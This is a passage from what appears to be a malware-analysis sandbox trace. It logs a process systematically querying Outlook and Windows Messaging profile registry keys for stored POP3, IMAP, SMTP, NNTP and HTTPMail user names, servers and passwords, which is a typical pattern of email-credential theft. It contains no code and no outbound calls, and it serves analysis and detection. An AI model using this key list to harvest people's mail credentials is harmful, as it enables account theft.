ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.874] RegQueryValueExW (in: hKey=0x528, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.874] RegCloseKey (hKey=0x528) returned 0x0 [0236.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.874] RegQueryValueExW (in: hKey=0x528, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.874] RegCloseKey (hKey=0x528) returned 0x0 [0236.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.875] RegQueryValueExW (in: hKey=0x528, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.875] RegCloseKey (hKey=0x528) returned 0x0 [0236.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.875] RegQueryValueExW (in: hKey=0x528, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.875] RegCloseKey (hKey=0x528) returned 0x0 [0236.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.875] RegQueryValueExW (in: hKey=0x528, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.875] RegCloseKey (hKey=0x528) returned 0x0 [0236.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.875] RegQueryValueExW (in: hKey=0x528, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.875] RegCloseKey (hKey=0x528) returned 0x0 [0236.875] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.876] RegQueryValueExW (in: hKey=0x528, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.876] RegCloseKey (hKey=0x528) returned 0x0 [0236.876] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.876] RegQueryValueExW (in: hKey=0x528, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.876] RegCloseKey (hKey=0x528) returned 0x0 [0236.876] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.876] RegQueryValueExW (in: hKey=0x528, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.876] RegCloseKey (hKey=0x528) returned 0x0 [0236.876] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.876] RegQueryValueExW (in: hKey=0x528, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.876] RegCloseKey (hKey=0x528) returned 0x0 [0236.876] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.877] RegQueryValueExW (in: hKey=0x528, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.877] RegCloseKey (hKey=0x528) returned 0x0 [0236.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.877] RegQueryValueExW (in: hKey=0x528, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.877] RegCloseKey (hKey=0x528) returned 0x0 [0236.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.877] RegQueryValueExW (in: hKey=0x528, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.877] RegCloseKey (hKey=0x528) returned 0x0 [0236.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.877] RegQueryValueExW (in: hKey=0x528, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.877] RegCloseKey (hKey=0x528) returned 0x0 [0236.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.877] RegQueryValueExW (in: hKey=0x528, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.877] RegCloseKey (hKey=0x528) returned 0x0 [0236.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.878] RegQueryValueExW (in: hKey=0x528, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.878] RegCloseKey (hKey=0x528) returned 0x0 [0236.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.878] RegQueryValueExW (in: hKey=0x528, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.878] RegCloseKey (hKey=0x528) returned 0x0 [0236.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.878] RegQueryValueExW (in: hKey=0x528, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.878] RegCloseKey (hKey=0x528) returned 0x0 [0236.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.878] RegQueryValueExW (in: hKey=0x528, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.878] RegCloseKey (hKey=0x528) returned 0x0 [0236.879] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x528) returned 0x0 [0236.879] RegQueryInfoKeyW (in: hKey=0x528, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.879] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x0) returned 0x2 [0236.879] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x615c144, lpdwDisposition=0x615c1cc | out: phkResult=0x615c144*=0x480, lpdwDisposition=0x615c1cc*=0x1) returned 0x0 [0236.880] RegQueryValueExW (in: hKey=0x480, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.880] RegCloseKey (hKey=0x480) returned 0x0 [0236.880] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.880] RegQueryValueExW (in: hKey=0x480, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.880] RegCloseKey (hKey=0x480) returned 0x0 [0236.880] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.880] RegQueryValueExW (in: hKey=0x480, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.880] RegCloseKey (hKey=0x480) returned 0x0 [0236.880] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.881] RegQueryValueExW (in: hKey=0x480, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.881] RegCloseKey (hKey=0x480) returned 0x0 [0236.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.881] RegQueryValueExW (in: hKey=0x480, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.881] RegCloseKey (hKey=0x480) returned 0x0 [0236.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.881] RegQueryValueExW (in: hKey=0x480, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.881] RegCloseKey (hKey=0x480) returned 0x0 [0236.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.881] RegQueryValueExW (in: hKey=0x480, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.881] RegCloseKey (hKey=0x480) returned 0x0 [0236.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.881] RegQueryValueExW (in: hKey=0x480, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.882] RegCloseKey (hKey=0x480) returned 0x0 [0236.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.882] RegQueryValueExW (in: hKey=0x480, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.882] RegCloseKey (hKey=0x480) returned 0x0 [0236.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.882] RegQueryValueExW (in: hKey=0x480, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.882] RegCloseKey (hKey=0x480) returned 0x0 [0236.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.882] RegQueryValueExW (in: hKey=0x480, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.882] RegCloseKey (hKey=0x480) returned 0x0 [0236.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.882] RegQueryValueExW (in: hKey=0x480, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.882] RegCloseKey (hKey=0x480) returned 0x0 [0236.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.883] RegQueryValueExW (in: hKey=0x480, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.883] RegCloseKey (hKey=0x480) returned 0x0 [0236.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.883] RegQueryValueExW (in: hKey=0x480, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.883] RegCloseKey (hKey=0x480) returned 0x0 [0236.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.883] RegQueryValueExW (in: hKey=0x480, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.883] RegCloseKey (hKey=0x480) returned 0x0 [0236.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.883] RegQueryValueExW (in: hKey=0x480, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.883] RegCloseKey (hKey=0x480) returned 0x0 [0236.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.884] RegQueryValueExW (in: hKey=0x480, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.884] RegCloseKey (hKey=0x480) returned 0x0 [0236.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.884] RegQueryValueExW (in: hKey=0x480, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.884] RegCloseKey (hKey=0x480) returned 0x0 [0236.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.884] RegQueryValueExW (in: hKey=0x480, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.884] RegCloseKey (hKey=0x480) returned 0x0 [0236.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.884] RegQueryValueExW (in: hKey=0x480, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.884] RegCloseKey (hKey=0x480) returned 0x0 [0236.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.885] RegQueryValueExW (in: hKey=0x480, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.885] RegCloseKey (hKey=0x480) returned 0x0 [0236.885] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.885] RegQueryValueExW (in: hKey=0x480, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.885] RegCloseKey (hKey=0x480) returned 0x0 [0236.885] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.885] RegQueryValueExW (in: hKey=0x480, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.885] RegCloseKey (hKey=0x480) returned 0x0 [0236.885] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.886] RegQueryValueExW (in: hKey=0x480, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.886] RegCloseKey (hKey=0x480) returned 0x0 [0236.886] RegOpenKeyExW (in: 